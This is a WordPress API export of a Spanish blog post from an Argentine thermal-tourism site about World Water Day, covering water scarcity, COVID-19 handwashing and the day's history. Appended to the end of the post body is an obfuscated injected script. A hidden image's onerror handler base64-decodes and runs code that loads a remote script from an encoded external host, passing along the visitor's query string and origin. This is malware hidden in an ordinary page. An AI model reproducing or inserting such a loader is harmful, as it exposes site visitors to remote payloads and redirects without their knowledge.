{"id":4323,"date":"2021-03-22T09:52:05","date_gmt":"2021-03-22T12:52:05","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=4323"},"modified":"2025-08-13T16:33:33","modified_gmt":"2025-08-13T19:33:33","slug":"22-de-marzo-dia-mundial-del-agua","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=4323","title":{"rendered":"22 DE MARZO, D\u00cdA MUNDIAL DEL AGUA"},"content":{"rendered":"\n<h2 class=\"has-vivid-cyan-blue-color has-text-color wp-block-heading\">LA IMPORTANCIA DEL AGUA<\/h2>\n\n\n\n<figure class=\"wp-block-embed alignright is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"D\u00eda Mundial del AGUA\" width=\"640\" height=\"360\" src=\"https:\/\/www.youtube.com\/embed\/UwNoLolzA9U?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>El D\u00eda Mundial del Agua se celebra cada&nbsp;22 de marzo para recordar la relevancia&nbsp;de este l\u00edquido esencial.&nbsp;A pesar de que todas las actividades sociales y econ\u00f3micas dependen en gran medida del abastecimiento de agua dulce y de su calidad,&nbsp;2 200 millones de personas viven sin acceso a agua potable. Esta celebraci\u00f3n tiene por objetivo concienciar acerca de la crisis mundial del agua y la necesidad de buscar medidas para abordarla&nbsp;de manera que alcancemos el&nbsp;<a href=\"https:\/\/www.un.org\/sustainabledevelopment\/es\/water-and-sanitation\/\" target=\"_blank\" rel=\"noreferrer noopener\">Objetivo de Desarrollo Sostenible No 6: Agua y saneamiento para todos antes de 2030<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2021\/03\/water_day_index-1-1024x379.png\" alt=\"\" class=\"wp-image-6426\" \/><\/figure>\n\n\n\n<p class=\"has-vivid-cyan-blue-color has-text-color\"><em>Escena cotidiana en la que se aprecia en el horizonte a un ni\u00f1o cargando garrafas de agua en Jowhar, Somalia (2013).<strong>FOTO:<\/strong>ONU\/Tobin Jones<\/em><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">VALOREMOS EL AGUA<\/h3>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.worldwaterday.org\/learn\"><img decoding=\"async\" src=\"https:\/\/www.un.org\/sites\/un2.un.org\/files\/wwd2021_dia_mundial_agua_poster.jpg\" alt=\"Ilustraci\u00f3n de unas casas junto a un r\u00edo y un texto donde se lee: \u00bfPor qu\u00e9 el agua es importante para ti?\" \/><\/a><\/figure>\n\n\n\n<p>Hoy en d\u00eda, el agua est\u00e1 muy amenazada por el crecimiento de la poblaci\u00f3n, las crecientes demandas de la agricultura y la industria, y el empeoramiento de los impactos del cambio clim\u00e1tico. Mientras las sociedades equilibran las demandas de recursos h\u00eddricos, los intereses de muchas personas no se tienen en cuenta.<\/p>\n\n\n\n<p>Este a\u00f1o el&nbsp;<a href=\"https:\/\/www.worldwaterday.org\/learn\" target=\"_blank\" rel=\"noreferrer noopener\">D\u00eda Mundial del Agua<\/a>&nbsp;trata de lo que significa el agua para las personas, su verdadero valor y c\u00f3mo podemos proteger mejor este recurso vital. La forma en que valoramos el agua determina c\u00f3mo se gestiona y se comparte. El valor del agua es mucho m\u00e1s que su precio: el agua tiene un valor enorme y complejo para nuestros hogares, la cultura, la salud, la educaci\u00f3n, la econom\u00eda y la integridad de nuestro entorno natural. Si pasamos por alto alguno de estos valores, corremos el riesgo de gestionar mal este recurso finito e insustituible.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.worldwaterday.org\/act\">\u00danete a la conversaci\u00f3n<\/a>&nbsp;sobre lo que significa el agua para ti utilizando estos&nbsp;<a href=\"https:\/\/www.worldwaterday.org\/share\">materiales disponibles<\/a>&nbsp;y cu\u00e9ntanos tu historia en las redes sociales a trav\u00e9s de&nbsp;la&nbsp;etiqueta&nbsp;#DiaMundialDelAgua.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">AGUA PARA FRENAR EL CORONAVIRUS<\/h3>\n\n\n\n<p>Lavarse las manos es esencial para contener la propagaci\u00f3n de COVID-19 y muchas otras enfermedades infecciosas.<\/p>\n\n\n\n<p>Por desgracia, casi&nbsp;<a href=\"http:\/\/news.un.org\/es\/story\/2020\/03\/1471171\">tres mil millones de&nbsp;personas en el mundo<\/a>&nbsp;no tienen c\u00f3mo lavarse las manos contra el coronavirus. Si t\u00fa tienes acceso a agua de calidad y jab\u00f3n, sigue los pasos y \u00fanete a la campa\u00f1a #ManosLimpias (#SafeHands en ingl\u00e9s). Por tu comunidad y por ti.<\/p>\n\n\n\n<p>Recuerda lavarte las&nbsp;<a href=\"https:\/\/www.unicef.org\/es\/coronavirus\/todo-lo-que-debes-saber-sobre-el-lavado-de-manos-para-protegerte-del-coronavirus-covid-19\">manos regularmente con agua y jab\u00f3n<\/a>&nbsp;o un desinfectante para manos a base de alcohol.<\/p>\n\n\n\n<p>Este #D\u00edaMundialDelAgua, vamos a mostrar lo responsables que somos lav\u00e1ndonos las manos&nbsp;y&nbsp;luchando&nbsp;contra la COVID19<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">HISTORIA DEL D\u00cdA<\/h3>\n\n\n\n<p>La idea de celebrar este d\u00eda internacional se remonta a 1992, a\u00f1o en el que tuvo lugar la&nbsp;<a href=\"http:\/\/www.un.org\/spanish\/conferences\/wssd\/unced.html\" target=\"_blank\" rel=\"noreferrer noopener\">Conferencia de las Naciones Unidas sobre el Medio Ambiente y el Desarrollo de R\u00edo de Janeiro<\/a>&nbsp;y en la que eman\u00f3 la propuesta. Ese mismo a\u00f1o, la Asamblea General adopt\u00f3 la&nbsp;<a href=\"https:\/\/undocs.org\/es\/A\/RES\/47\/193\" target=\"_blank\" rel=\"noreferrer noopener\">resoluci\u00f3n<\/a>&nbsp;por la que el 22 de marzo de cada a\u00f1o fue declarado D\u00eda Mundial del Agua, siendo 1993 el primer a\u00f1o de celebraci\u00f3n.<\/p>\n\n\n\n<p>A esta celebraci\u00f3n del D\u00eda se a\u00f1adir\u00edan posteriormente eventos&nbsp;anuales espec\u00edficos en torno al agua (por ejemplo, el A\u00f1o Internacional de Cooperaci\u00f3n en la Esfera del Agua 2013) e incluso decenios de acci\u00f3n (como es el caso del actual&nbsp;<a href=\"https:\/\/www.un.org\/es\/events\/waterdecade\/index.shtml\" target=\"_blank\" rel=\"noreferrer noopener\">Decenio \u201cAgua para el Desarrollo Sostenible\u201d, 2018-2028<\/a>). Todo ello no hace sino reafirmar&nbsp;que las medidas h\u00eddricas y de saneamiento son clave en&nbsp;la reducci\u00f3n de la pobreza, el crecimiento econ\u00f3mico y la sostenibilidad ambiental.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.un.org\/es\/observances\/water-day\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2021\/03\/Agua-1.jpg\" alt=\"\" class=\"wp-image-6427\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>LA IMPORTANCIA DEL AGUA El D\u00eda Mundial del Agua se celebra cada&nbsp;22 de marzo para recordar la relevancia&nbsp;de este l\u00edquido esencial.&nbsp;A pesar de que todas las actividades sociales y econ\u00f3micas dependen en gran medida del abastecimiento de agua dulce y de su calidad,&nbsp;2 200 millones de personas viven sin acceso a agua potable. Esta celebraci\u00f3n [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4324,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29,12],"tags":[],"class_list":["post-4323","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles","category-internacionales"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4323","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4323"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4323\/revisions"}],"predecessor-version":[{"id":10854,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4323\/revisions\/10854"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4324"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4323"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4323"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4323"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}